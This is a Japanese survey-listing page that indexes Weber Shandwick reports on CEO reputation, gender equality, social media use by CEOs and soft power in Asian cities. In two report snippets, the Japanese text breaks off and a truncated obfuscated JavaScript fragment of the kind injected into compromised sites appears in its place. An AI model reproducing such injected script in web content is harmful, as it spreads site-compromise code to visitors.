「Weber Shandwick」による調査データ一覧 | 調査のチカラ

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2016年10月20日Weber Shandwick★フィードバック数:0マーケティング

マーケターが踏まえておくべき人工知能(AI)時代の到来

As one of Japan’s first public relations companies, Weber Shandwick’s Japan office – the firm behind Tokyo’s bid for the 2020 Summer Olympics; draws on more than 55 years of experience to meet the communications needs of its local, regional and globa

2016年3月13日Weber Shandwickフィードバック数:0キャリアとスキル

ジェンダー・フォワード・パイオニア・インデックス

As one of Japan’s first public relations companies, Weber Shandwick’s Japan office – the firm behind Tokyo’s bid for the 2020 Summer Olympics; draws on more than 55 years of experience to meet the communications needs of its local, regional and globa

2015年10月22日Weber Shandwickフィードバック数:0キャリアとスキル

世界の企業経営者におけるジェンダー平等性

As one of Japan’s first public relations companies, Weber Shandwick’s Japan office – the firm behind Tokyo’s bid for the 2020 Summer Olympics; draws on more than 55 years of experience to meet the communications needs of its local, regional and globa

2015年7月6日Weber Shandwick★★フィードバック数:0ビジネス

女性CEOのレピュテーション調査

ウェーバー・シャンドウィックはKRCリサーチ社と共同で実施した調査報告書「女性CEOのレピュテーション調査~相違点と類似点~(以下、本報告書)」を発表しました。本報告書は、北米、欧州、アジア太平洋地域および中南米の19カ国1,750人以上の管理職を対象にインターネット上でアンケートを行ったもので、2015年3月に発表した調査報告書「$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "stri

2015年5月19日Weber Shandwick★フィードバック数:0マーケティング

CEOのソーシャル活用についての調査です。

第3回ソーシャルCEO調査

As one of Japan’s first public relations companies, Weber Shandwick’s Japan office – the firm behind Tokyo’s bid for the 2020 Summer Olympics; draws on more than 55 years of experience to meet the communications needs of its local, regional and globa

2015年3月6日Weber Shandwick★フィードバック数:0マーケティング

企業の顔としてのCEOについてのレポートです。

CEOレピュテーションの付加価値:エンゲージメント時代を勝ち抜くために

CEO レピュテーションの付加価値:エンゲージメント時代を勝ち抜くために ウェーバー・シャンドウィックは、KRCリサーチ社と共同で、北米、欧州、アジア太平洋地域および中南米の19カ国1,700人以上の管理職を対象とする調査結果「$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").r

2014年12月11日Weber Shandwick★フィードバック数:0社会/政治

バンコク、香港、クアラルンプール、ソウル、上海、シンガポール、シドニー、東京が対象です。

アジア太平洋地域の主要8都市 ソフト・パワーに関する調査

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2009年11月9日Weber Shandwickフィードバック数:0大型消費/投資

2009 年「旅行・観光分野の国別ブランド評価ランキング」

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